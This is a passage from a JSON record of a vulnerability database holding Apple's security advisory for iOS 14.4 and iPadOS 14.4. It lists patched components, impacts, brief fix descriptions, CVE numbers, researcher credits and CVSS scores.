and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**IOSkywalkFamily**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Proteas and Pan ZhenPeng (@Peterpan0927) of Alibaba Security\n\nEntry added February 1, 2021\n\n**iTunes Store**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted URL may lead to arbitrary javascript code execution\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2021-1748: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: Maxime Villard (@m00nbsd)\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Messages**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.\n\nCVE-2021-1781: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2021-1763: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1768: Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1745: Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1762: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1767: Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1753: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**Phone Keypad**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An attacker with physical access to a device may be able to see private contact information\n\nDescription: A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management.\n\nCVE-2021-1756: Ryan Pickren (ryanpickren.com)\n\nEntry added February 1, 2021\n\n**Swift**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1801: Eliya Stein of Confiant\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-1871: an anonymous researcher\n\nCVE-2021-1870: an anonymous researcher\n\n**WebRTC**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\nEntry added February 1, 2021\n\n\n\n## Additional recognition\n\n**iTunes Store**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\nEntry added February 1, 2021\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Mail**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and an anonymous researcher for their assistance.\n\nEntry added February 1, 2021\n\n**Store Demo**\n\nWe would like to acknowledge @08Tc3wBB for their assistance.\n\nEntry added February 1, 2021\n\n**WebRTC**\n\nWe would like to acknowledge Philipp Hancke for their assistance.\n\nEntry added February 1, 2021\n\n**Wi-Fi**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\nEntry added February 1, 2021\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-01T06:39:19", "title": "About the security content of iOS 14.4 and iPadOS 14.4 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1753", "CVE-2021-1818", "CVE-2021-1871", "CVE-2021-1772", "CVE-2021-1763", "CVE-2021-1778", "CVE-2021-1743", "CVE-2021-1769", "CVE-2021-1761", "CVE-2021-1762", "CVE-2021-1780", "CVE-2021-1792", "CVE-2021-1794", "CVE-2021-1757", "CVE-2021-1795", "CVE-2021-1744", "CVE-2021-1786", "CVE-2021-1791", "CVE-2021-1748", "CVE-2021-1773", "CVE-2021-1767", "CVE-2021-1758", "CVE-2021-1787", "CVE-2021-1760", "CVE-2021-1768", "CVE-2021-1870", "CVE-2021-1746", "CVE-2021-1745", "CVE-2021-1785", "CVE-2021-1759", "CVE-2021-1756", "CVE-2021-1741", "CVE-2021-1747", "CVE-2021-1801", "CVE-2021-1781", "CVE-2021-1799", "CVE-2021-1788", "CVE-2021-1782", "CVE-2021-1766", "CVE-2021-1783", "CVE-2021-1797", "CVE-2021-1793", "CVE-2021-1776", "CVE-2021-1789", "CVE-2021-1796", "CVE-2021-1764", "CVE-2021-1750"], "modified": "2021-02-01T06:39:19", "id": "APPLE:HT212146", "href": "https://support.apple.com/kb/HT212146", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T22:02:38", "description": "# About the security content of iOS 14.4 and iPadOS 14.4\n\nThis document describes the security content of iOS 14.4 and iPadOS 14.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 14.4 and iPadOS 14.4\n\nReleased January 26, 2021\n\n**Analytics**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) \n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**APFS**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1794: Jianjun Dai of 360 Alpha Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1795: Jianjun Dai of 360 Alpha Lab\n\nCVE-2021-1796: Jianjun Dai of 360 Alpha Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1780: Jianjun Dai of 360 Alpha Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**CoreAnimation**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**CoreAudio**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**CoreGraphics**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**CoreMedia**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1759: Hou JingYi (@hjy79425575) of Qihoo 360 CERT\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**CoreText**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**CoreText**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Crash Reporter**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Crash Reporter**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**FairPlay**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu(@pwn0rz), Qi Sun and Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**FontParser**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1737: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1738: Lei Sun\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin of Ant-Financial Light-Year Security Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation) \n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1838: Mickey Jin & Qi Sun of Trend Micro working with Trend Micro's Zero Day Initiative\n\nCVE-2021-1742: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1746: Xingwei Lin of Ant Security Light-Year Lab, Mickey Jin & Qi Sun of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, and Jeonghoon Shin(@singi21a) of THEORI\n\nCVE-2021-1754: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1774: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**IOSkywalkFamily**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Proteas and Pan ZhenPeng (@Peterpan0927) of Alibaba Security\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**iTunes Store**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted URL may lead to arbitrary javascript code execution\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2021-1748: CodeColorist working with Ant Security Light-Year Labs\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: @m00nbsd\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Kernel**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\nEntry updated May 28, 2021 \n\n**Messages**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.\n\nCVE-2021-1781: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2021-1763: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1768: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1745: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1762: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1762: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1767: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1753: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Model I/O**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1753: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**Phone Keypad**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An attacker with physical access to a device may be able to see private contact information\n\nDescription: A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management.\n\nCVE-2021-1756: Ryan Pickren (ryanpickren.com)\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**Swift**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021, updated May 28, 2021 \n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\nEntry added February 1, 2021, updated May 28, 2021\n\n**WebKit**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 